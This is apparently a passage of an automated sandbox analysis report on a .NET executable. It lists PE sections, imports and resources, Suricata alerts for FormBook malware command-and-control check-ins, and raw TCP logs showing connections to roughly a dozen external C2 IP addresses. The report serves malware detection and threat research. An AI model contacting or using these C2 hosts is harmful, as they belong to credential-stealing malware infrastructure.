                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al

                                                                                Data Directories

                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xc39f40x57.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x4ca8.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xca0000xc.reloc
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                Sections

                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x20000xc1a540xc1c00a724df225ce7ea33dafe72d6fdbedddcFalse0.9089818548387096data7.780021412382436IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                .rsrc0xc40000x4ca80x4e00d27bc007cf0673171da6599495e50d87False0.9410556891025641data7.768996075933271IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .reloc0xca0000xc0x20089a4346b0d30bc07d9f8a93c072a30cbFalse0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                Resources

                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                RT_ICON0xc41300x46f9PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9932852661126094
                                                                                RT_GROUP_ICON0xc882c0x14data1.05
                                                                                RT_VERSION0xc88400x278data0.47151898734177217
                                                                                RT_MANIFEST0xc8ab80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                Imports

                                                                                DLLImport
                                                                                mscoree.dll_CorExeMain

                                                                                Network Behavior

                                                                                Suricata IDS Alerts

                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                2024-12-03T14:13:59.664590+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54975427.124.4.24680TCP
                                                                                2024-12-03T14:14:18.102307+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549798156.232.181.15580TCP
                                                                                2024-12-03T14:14:20.758442+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549805156.232.181.15580TCP
                                                                                2024-12-03T14:14:23.414703+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549811156.232.181.15580TCP
                                                                                2024-12-03T14:14:26.423986+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549817156.232.181.15580TCP
                                                                                2024-12-03T14:14:33.522702+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549837185.27.134.20680TCP
                                                                                2024-12-03T14:14:36.197554+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549843185.27.134.20680TCP
                                                                                2024-12-03T14:14:38.897749+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549850185.27.134.20680TCP
                                                                                2024-12-03T14:14:41.763701+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549856185.27.134.20680TCP
                                                                                2024-12-03T14:14:49.148040+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54987488.99.61.5280TCP
                                                                                2024-12-03T14:14:51.843228+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54987988.99.61.5280TCP
                                                                                2024-12-03T14:14:54.482737+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54988588.99.61.5280TCP
                                                                                2024-12-03T14:14:57.142388+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54989088.99.61.5280TCP
                                                                                2024-12-03T14:15:03.797325+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549903104.21.90.13780TCP
                                                                                2024-12-03T14:15:06.530520+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549910104.21.90.13780TCP
                                                                                2024-12-03T14:15:09.258879+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549916104.21.90.13780TCP
                                                                                2024-12-03T14:15:11.930768+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549923104.21.90.13780TCP
                                                                                2024-12-03T14:15:18.822371+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549939209.74.77.10780TCP
                                                                                2024-12-03T14:15:21.466554+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549945209.74.77.10780TCP
                                                                                2024-12-03T14:15:23.844049+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549952209.74.77.10780TCP
                                                                                2024-12-03T14:15:26.767942+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549958209.74.77.10780TCP
                                                                                2024-12-03T14:15:33.635830+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549974176.32.38.13080TCP
                                                                                2024-12-03T14:15:36.346790+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549980176.32.38.13080TCP
                                                                                2024-12-03T14:15:39.006954+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549987176.32.38.13080TCP
                                                                                2024-12-03T14:15:41.724345+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549993176.32.38.13080TCP
                                                                                2024-12-03T14:15:48.792520+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550006161.97.168.24580TCP
                                                                                2024-12-03T14:15:51.495367+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550007161.97.168.24580TCP
                                                                                2024-12-03T14:15:54.185697+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550008161.97.168.24580TCP
                                                                                2024-12-03T14:15:56.861807+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550009161.97.168.24580TCP
                                                                                2024-12-03T14:16:04.430200+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550010103.75.185.2280TCP
                                                                                2024-12-03T14:16:07.104583+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550011103.75.185.2280TCP
                                                                                2024-12-03T14:16:09.773914+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550012103.75.185.2280TCP
                                                                                2024-12-03T14:16:12.663682+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550013103.75.185.2280TCP
                                                                                2024-12-03T14:16:19.610664+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550014155.94.253.480TCP
                                                                                2024-12-03T14:16:22.265274+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550015155.94.253.480TCP
                                                                                2024-12-03T14:16:24.994548+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550016155.94.253.480TCP
                                                                                2024-12-03T14:16:27.647591+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550017155.94.253.480TCP
                                                                                2024-12-03T14:16:34.591819+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550018208.91.197.2780TCP
                                                                                2024-12-03T14:16:37.336818+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550019208.91.197.2780TCP
                                                                                2024-12-03T14:16:39.982733+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550020208.91.197.2780TCP
                                                                                2024-12-03T14:16:43.000879+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550021208.91.197.2780TCP
                                                                                2024-12-03T14:16:49.806431+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550022217.160.0.20080TCP
                                                                                2024-12-03T14:16:52.462477+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550023217.160.0.20080TCP
                                                                                2024-12-03T14:16:55.183068+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550024217.160.0.20080TCP
                                                                                2024-12-03T14:16:57.765590+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550025217.160.0.20080TCP
                                                                                2024-12-03T14:17:06.539514+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550026154.70.82.24680TCP
                                                                                2024-12-03T14:17:09.212414+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550027154.70.82.24680TCP
                                                                                2024-12-03T14:17:11.899708+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550028154.70.82.24680TCP
                                                                                2024-12-03T14:17:16.246315+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550029154.70.82.24680TCP

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Dec 3, 2024 14:13:58.065558910 CET4975480192.168.2.527.124.4.246
                                                                                Dec 3, 2024 14:13:58.185765028 CET804975427.124.4.246192.168.2.5
                                                                                Dec 3, 2024 14:13:58.185885906 CET4975480192.168.2.527.124.4.246
                                                                                Dec 3, 2024 14:13:58.195678949 CET4975480192.168.2.527.124.4.246
                                                                                Dec 3, 2024 14:13:58.331881046 CET804975427.124.4.246192.168.2.5
                                                                                Dec 3, 2024 14:13:59.617350101 CET804975427.124.4.246192.168.2.5
                                                                                Dec 3, 2024 14:13:59.664589882 CET4975480192.168.2.527.124.4.246
                                                                                Dec 3, 2024 14:13:59.828264952 CET804975427.124.4.246192.168.2.5
                                                                                Dec 3, 2024 14:13:59.828454971 CET4975480192.168.2.527.124.4.246
                                                                                Dec 3, 2024 14:13:59.829916954 CET4975480192.168.2.527.124.4.246
                                                                                Dec 3, 2024 14:13:59.954009056 CET804975427.124.4.246192.168.2.5
                                                                                Dec 3, 2024 14:14:16.446228981 CET4979880192.168.2.5156.232.181.155
                                                                                Dec 3, 2024 14:14:16.569994926 CET8049798156.232.181.155192.168.2.5
                                                                                Dec 3, 2024 14:14:16.570080996 CET4979880192.168.2.5156.232.181.155
                                                                                Dec 3, 2024 14:14:16.594978094 CET4979880192.168.2.5156.232.181.155
                                                                                Dec 3, 2024 14:14:16.715059042 CET8049798156.232.181.155192.168.2.5
                                                                                Dec 3, 2024 14:14:18.102307081 CET4979880192.168.2.5156.232.181.155
                                                                                Dec 3, 2024 14:14:18.223042965 CET8049798156.232.181.155192.168.2.5
                                                                                Dec 3, 2024 14:14:18.223105907 CET4979880192.168.2.5156.232.181.155
                                                                                Dec 3, 2024 14:14:19.120790005 CET4980580192.168.2.5156.232.181.155
                                                                                Dec 3, 2024 14:14:19.241204977 CET8049805156.232.181.155192.168.2.5
                                                                                Dec 3, 2024 14:14:19.241410971 CET4980580192.168.2.5156.232.181.155
                                                                                Dec 3, 2024 14:14:19.256313086 CET4980580192.168.2.5156.232.181.155
                                                                                Dec 3, 2024 14:14:19.376410007 CET8049805156.232.181.155192.168.2.5
                                                                                Dec 3, 2024 14:14:20.758441925 CET4980580192.168.2.5156.232.181.155
                                                                                Dec 3, 2024 14:14:20.878786087 CET8049805156.232.181.155192.168.2.5
                                                                                Dec 3, 2024 14:14:20.879074097 CET4980580192.168.2.5156.232.181.155
                                                                                Dec 3, 2024 14:14:21.777120113 CET4981180192.168.2.5156.232.181.155
                                                                                Dec 3, 2024 14:14:21.897231102 CET8049811156.232.181.155192.168.2.5
                                                                                Dec 3, 2024 14:14:21.897474051 CET4981180192.168.2.5156.232.181.155
                                                                                Dec 3, 2024 14:14:21.912345886 CET4981180192.168.2.5156.232.181.155
                                                                                Dec 3, 2024 14:14:22.032439947 CET8049811156.232.181.155192.168.2.5
                                                                                Dec 3, 2024 14:14:22.032541990 CET8049811156.232.181.155192.168.2.5
                                                                                Dec 3, 2024 14:14:23.414702892 CET4981180192.168.2.5156.232.181.155
                                                                                Dec 3, 2024 14:14:23.535017014 CET8049811156.232.181.155192.168.2.5
                                                                                Dec 3, 2024 14:14:23.535073042 CET4981180192.168.2.5156.232.181.155
                                                                                Dec 3, 2024 14:14:24.433490992 CET4981780192.168.2.5156.232.181.155
                                                                                Dec 3, 2024 14:14:24.553877115 CET8049817156.232.181.155192.168.2.5
                                                                                Dec 3, 2024 14:14:24.554044008 CET4981780192.168.2.5156.232.181.155
                                                                                Dec 3, 2024 14:14:24.564095020 CET4981780192.168.2.5156.232.181.155
                                                                                Dec 3, 2024 14:14:24.690140963 CET8049817156.232.181.155192.168.2.5
                                                                                Dec 3, 2024 14:14:26.423707008 CET8049817156.232.181.155192.168.2.5
                                                                                Dec 3, 2024 14:14:26.423784971 CET8049817156.232.181.155192.168.2.5
                                                                                Dec 3, 2024 14:14:26.423985958 CET4981780192.168.2.5156.232.181.155
                                                                                Dec 3, 2024 14:14:26.426657915 CET4981780192.168.2.5156.232.181.155
                                                                                Dec 3, 2024 14:14:26.546777010 CET8049817156.232.181.155192.168.2.5
                                                                                Dec 3, 2024 14:14:32.106647015 CET4983780192.168.2.5185.27.134.206
                                                                                Dec 3, 2024 14:14:32.226711035 CET8049837185.27.134.206192.168.2.5
                                                                                Dec 3, 2024 14:14:32.226913929 CET4983780192.168.2.5185.27.134.206
                                                                                Dec 3, 2024 14:14:32.242265940 CET4983780192.168.2.5185.27.134.206
                                                                                Dec 3, 2024 14:14:32.363322973 CET8049837185.27.134.206192.168.2.5
                                                                                Dec 3, 2024 14:14:33.522542953 CET8049837185.27.134.206192.168.2.5
                                                                                Dec 3, 2024 14:14:33.522656918 CET8049837185.27.134.206192.168.2.5
                                                                                Dec 3, 2024 14:14:33.522701979 CET4983780192.168.2.5185.27.134.206
                                                                                Dec 3, 2024 14:14:33.758436918 CET4983780192.168.2.5185.27.134.206
                                                                                Dec 3, 2024 14:14:34.777415037 CET4984380192.168.2.5185.27.134.206
                                                                                Dec 3, 2024 14:14:34.898210049 CET8049843185.27.134.206192.168.2.5
                                                                                Dec 3, 2024 14:14:34.898333073 CET4984380192.168.2.5185.27.134.206
                                                                                Dec 3, 2024 14:14:34.913707018 CET4984380192.168.2.5185.27.134.206
                                                                                Dec 3, 2024 14:14:35.033802032 CET8049843185.27.134.206192.168.2.5
                                                                                Dec 3, 2024 14:14:36.197098017 CET8049843185.27.134.206192.168.2.5
                                                                                Dec 3, 2024 14:14:36.197501898 CET8049843185.27.134.206192.168.2.5
                                                                                Dec 3, 2024 14:14:36.197554111 CET4984380192.168.2.5185.27.134.206
                                                                                Dec 3, 2024 14:14:36.430354118 CET4984380192.168.2.5185.27.134.206
                                                                                Dec 3, 2024 14:14:37.479754925 CET4985080192.168.2.5185.27.134.206
                                                                                Dec 3, 2024 14:14:37.599899054 CET8049850185.27.134.206192.168.2.5
                                                                                Dec 3, 2024 14:14:37.600012064 CET4985080192.168.2.5185.27.134.206
                                                                                Dec 3, 2024 14:14:37.686753988 CET4985080192.168.2.5185.27.134.206
                                                                                Dec 3, 2024 14:14:37.807320118 CET8049850185.27.134.206192.168.2.5
                                                                                Dec 3, 2024 14:14:37.807362080 CET8049850185.27.134.206192.168.2.5
                                                                                Dec 3, 2024 14:14:38.897469997 CET8049850185.27.134.206192.168.2.5
                                                                                Dec 3, 2024 14:14:38.897620916 CET8049850185.27.134.206192.168.2.5
                                                                                Dec 3, 2024 14:14:38.897748947 CET4985080192.168.2.5185.27.134.206
                                                                                Dec 3, 2024 14:14:39.195950031 CET4985080192.168.2.5185.27.134.206
                                                                                Dec 3, 2024 14:14:40.393861055 CET4985680192.168.2.5185.27.134.206
                                                                                Dec 3, 2024 14:14:40.514297962 CET8049856185.27.134.206192.168.2.5
                                                                                Dec 3, 2024 14:14:40.514389992 CET4985680192.168.2.5185.27.134.206
                                                                                Dec 3, 2024 14:14:40.593611956 CET4985680192.168.2.5185.27.134.206
                                                                                Dec 3, 2024 14:14:40.713664055 CET8049856185.27.134.206192.168.2.5
                                                                                Dec 3, 2024 14:14:41.763470888 CET8049856185.27.134.206192.168.2.5
                                                                                Dec 3, 2024 14:14:41.763505936 CET8049856185.27.134.206192.168.2.5
                                                                                Dec 3, 2024 14:14:41.763700962 CET4985680192.168.2.5185.27.134.206
                                                                                Dec 3, 2024 14:14:41.766402006 CET4985680192.168.2.5185.27.134.206
                                                                                Dec 3, 2024 14:14:41.886346102 CET8049856185.27.134.206192.168.2.5
                                                                                Dec 3, 2024 14:14:47.688508987 CET4987480192.168.2.588.99.61.52
                                                                                Dec 3, 2024 14:14:47.811429024 CET804987488.99.61.52192.168.2.5
                                                                                Dec 3, 2024 14:14:47.811614037 CET4987480192.168.2.588.99.61.52
                                                                                Dec 3, 2024 14:14:47.828804970 CET4987480192.168.2.588.99.61.52
                                                                                Dec 3, 2024 14:14:47.951334953 CET804987488.99.61.52192.168.2.5
                                                                                Dec 3, 2024 14:14:49.147865057 CET804987488.99.61.52192.168.2.5
                                                                                Dec 3, 2024 14:14:49.147953033 CET804987488.99.61.52192.168.2.5
                                                                                Dec 3, 2024 14:14:49.148040056 CET4987480192.168.2.588.99.61.52
                                                                                Dec 3, 2024 14:14:49.336564064 CET4987480192.168.2.588.99.61.52
                                                                                Dec 3, 2024 14:14:50.355546951 CET4987980192.168.2.588.99.61.52
                                                                                Dec 3, 2024 14:14:50.475903034 CET804987988.99.61.52192.168.2.5
                                                                                Dec 3, 2024 14:14:50.476063967 CET4987980192.168.2.588.99.61.52
                                                                                Dec 3, 2024 14:14:50.492878914 CET4987980192.168.2.588.99.61.52
                                                                                Dec 3, 2024 14:14:50.614188910 CET804987988.99.61.52192.168.2.5
                                                                                Dec 3, 2024 14:14:51.843071938 CET804987988.99.61.52192.168.2.5
                                                                                Dec 3, 2024 14:14:51.843144894 CET804987988.99.61.52192.168.2.5
                                                                                Dec 3, 2024 14:14:51.843228102 CET4987980192.168.2.588.99.61.52
                                                                                Dec 3, 2024 14:14:52.008362055 CET4987980192.168.2.588.99.61.52
                                                                                Dec 3, 2024 14:14:53.027252913 CET4988580192.168.2.588.99.61.52
                                                                                Dec 3, 2024 14:14:53.147711992 CET804988588.99.61.52192.168.2.5
                                                                                Dec 3, 2024 14:14:53.147804022 CET4988580192.168.2.588.99.61.52
                                                                                Dec 3, 2024 14:14:53.165179968 CET4988580192.168.2.588.99.61.52
                                                                                Dec 3, 2024 14:14:53.285541058 CET804988588.99.61.52192.168.2.5
                                                                                Dec 3, 2024 14:14:53.285696983 CET804988588.99.61.52192.168.2.5
                                                                                Dec 3, 2024 14:14:54.482547998 CET804988588.99.61.52192.168.2.5
                                                                                Dec 3, 2024 14:14:54.482676983 CET804988588.99.61.52192.168.2.5
                                                                                Dec 3, 2024 14:14:54.482737064 CET4988580192.168.2.588.99.61.52
                                                                                Dec 3, 2024 14:14:54.680218935 CET4988580192.168.2.588.99.61.52
                                                                                Dec 3, 2024 14:14:55.701231003 CET4989080192.168.2.588.99.61.52
                                                                                Dec 3, 2024 14:14:55.821300983 CET804989088.99.61.52192.168.2.5
                                                                                Dec 3, 2024 14:14:55.821382046 CET4989080192.168.2.588.99.61.52
                                                                                Dec 3, 2024 14:14:55.835191965 CET4989080192.168.2.588.99.61.52
                                                                                Dec 3, 2024 14:14:55.956743002 CET804989088.99.61.52192.168.2.5
                                                                                Dec 3, 2024 14:14:57.142148972 CET804989088.99.61.52192.168.2.5
                                                                                Dec 3, 2024 14:14:57.142185926 CET804989088.99.61.52192.168.2.5
                                                                                Dec 3, 2024 14:14:57.142388105 CET4989080192.168.2.588.99.61.52
                                                                                Dec 3, 2024 14:14:57.205339909 CET4989080192.168.2.588.99.61.52
                                                                                Dec 3, 2024 14:14:57.325396061 CET804989088.99.61.52192.168.2.5
                                                                                Dec 3, 2024 14:15:02.528754950 CET4990380192.168.2.5104.21.90.137
                                                                                Dec 3, 2024 14:15:02.648844004 CET8049903104.21.90.137192.168.2.5
                                                                                Dec 3, 2024 14:15:02.649574995 CET4990380192.168.2.5104.21.90.137
                                                                                Dec 3, 2024 14:15:02.664835930 CET4990380192.168.2.5104.21.90.137
                                                                                Dec 3, 2024 14:15:02.785263062 CET8049903104.21.90.137192.168.2.5
                                                                                Dec 3, 2024 14:15:03.796664000 CET8049903104.21.90.137192.168.2.5
                                                                                Dec 3, 2024 14:15:03.797269106 CET8049903104.21.90.137192.168.2.5
                                                                                Dec 3, 2024 14:15:03.797324896 CET4990380192.168.2.5104.21.90.137
                                                                                Dec 3, 2024 14:15:04.180243015 CET4990380192.168.2.5104.21.90.137
                                                                                Dec 3, 2024 14:15:05.199481010 CET4991080192.168.2.5104.21.90.137
                                                                                Dec 3, 2024 14:15:05.319540977 CET8049910104.21.90.137192.168.2.5
                                                                                Dec 3, 2024 14:15:05.320614100 CET4991080192.168.2.5104.21.90.137
                                                                                Dec 3, 2024 14:15:05.335757017 CET4991080192.168.2.5104.21.90.137
                                                                                Dec 3, 2024 14:15:05.455679893 CET8049910104.21.90.137192.168.2.5
                                                                                Dec 3, 2024 14:15:06.530419111 CET8049910104.21.90.137192.168.2.5
                                                                                Dec 3, 2024 14:15:06.530447960 CET8049910104.21.90.137192.168.2.5
                                                                                Dec 3, 2024 14:15:06.530519962 CET4991080192.168.2.5104.21.90.137
                                                                                Dec 3, 2024 14:15:06.852092981 CET4991080192.168.2.5104.21.90.137
                                                                                Dec 3, 2024 14:15:07.871535063 CET4991680192.168.2.5104.21.90.137
                                                                                Dec 3, 2024 14:15:07.991631985 CET8049916104.21.90.137192.168.2.5
                                                                                Dec 3, 2024 14:15:07.991709948 CET4991680192.168.2.5104.21.90.137
                                                                                Dec 3, 2024 14:15:08.013103008 CET4991680192.168.2.5104.21.90.137
                                                                                Dec 3, 2024 14:15:08.133143902 CET8049916104.21.90.137192.168.2.5
                                                                                Dec 3, 2024 14:15:08.133166075 CET8049916104.21.90.137192.168.2.5
                                                                                Dec 3, 2024 14:15:09.258505106 CET8049916104.21.90.137192.168.2.5
                                                                                Dec 3, 2024 14:15:09.258704901 CET8049916104.21.90.137192.168.2.5
                                                                                Dec 3, 2024 14:15:09.258878946 CET4991680192.168.2.5104.21.90.137
                                                                                Dec 3, 2024 14:15:09.526415110 CET4991680192.168.2.5104.21.90.137
                                                                                Dec 3, 2024 14:15:10.543272972 CET4992380192.168.2.5104.21.90.137
                                                                                Dec 3, 2024 14:15:10.663345098 CET8049923104.21.90.137192.168.2.5
                                                                                Dec 3, 2024 14:15:10.666045904 CET4992380192.168.2.5104.21.90.137
                                                                                Dec 3, 2024 14:15:10.676479101 CET4992380192.168.2.5104.21.90.137
                                                                                Dec 3, 2024 14:15:10.796540976 CET8049923104.21.90.137192.168.2.5
                                                                                Dec 3, 2024 14:15:11.930099010 CET8049923104.21.90.137192.168.2.5
                                                                                Dec 3, 2024 14:15:11.930711985 CET8049923104.21.90.137192.168.2.5
                                                                                Dec 3, 2024 14:15:11.930768013 CET4992380192.168.2.5104.21.90.137
                                                                                Dec 3, 2024 14:15:11.933549881 CET4992380192.168.2.5104.21.90.137
                                                                                Dec 3, 2024 14:15:12.053675890 CET8049923104.21.90.137192.168.2.5
                                                                                Dec 3, 2024 14:15:17.409109116 CET4993980192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:17.529098988 CET8049939209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:17.529269934 CET4993980192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:17.545638084 CET4993980192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:17.665659904 CET8049939209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:18.822029114 CET8049939209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:18.822173119 CET8049939209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:18.822371006 CET4993980192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:19.055241108 CET4993980192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:20.074666977 CET4994580192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:20.195322037 CET8049945209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:20.195430040 CET4994580192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:20.214359045 CET4994580192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:20.334582090 CET8049945209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:21.465904951 CET8049945209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:21.465985060 CET8049945209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:21.466553926 CET4994580192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:21.727098942 CET4994580192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:22.745879889 CET4995280192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:22.865952969 CET8049952209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:22.870563030 CET4995280192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:22.890433073 CET4995280192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:23.148901939 CET4995280192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:23.523921013 CET4995280192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:23.843988895 CET8049952209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:23.844006062 CET8049952209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:23.844048977 CET4995280192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:23.893120050 CET8049952209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:23.943262100 CET8049952209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:23.965044022 CET8049952209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:24.398943901 CET4995280192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:24.564693928 CET8049952209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:24.662591934 CET8049952209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:24.666488886 CET4995280192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:25.418432951 CET4995880192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:25.538805962 CET8049958209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:25.538899899 CET4995880192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:25.548809052 CET4995880192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:25.669879913 CET8049958209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:26.767414093 CET8049958209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:26.767488003 CET8049958209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:26.767941952 CET4995880192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:26.770581961 CET4995880192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:26.890538931 CET8049958209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:32.185986996 CET4997480192.168.2.5176.32.38.130
                                                                                Dec 3, 2024 14:15:32.306129932 CET8049974176.32.38.130192.168.2.5
                                                                                Dec 3, 2024 14:15:32.306224108 CET4997480192.168.2.5176.32.38.130
                                                                                Dec 3, 2024 14:15:32.334563971 CET4997480192.168.2.5176.32.38.130
                                                                                Dec 3, 2024 14:15:32.456425905 CET8049974176.32.38.130192.168.2.5
                                                                                Dec 3, 2024 14:15:33.635622978 CET8049974176.32.38.130192.168.2.5
                                                                                Dec 3, 2024 14:15:33.635780096 CET8049974176.32.38.130192.168.2.5
                                                                                Dec 3, 2024 14:15:33.635829926 CET4997480192.168.2.5176.32.38.130
                                                                                Dec 3, 2024 14:15:33.836443901 CET4997480192.168.2.5176.32.38.130
                                                                                Dec 3, 2024 14:15:34.855205059 CET4998080192.168.2.5176.32.38.130
                                                                                Dec 3, 2024 14:15:34.975192070 CET8049980176.32.38.130192.168.2.5
                                                                                Dec 3, 2024 14:15:34.975331068 CET4998080192.168.2.5176.32.38.130
                                                                                Dec 3, 2024 14:15:34.991055012 CET4998080192.168.2.5176.32.38.130
                                                                                Dec 3, 2024 14:15:35.110971928 CET8049980176.32.38.130192.168.2.5
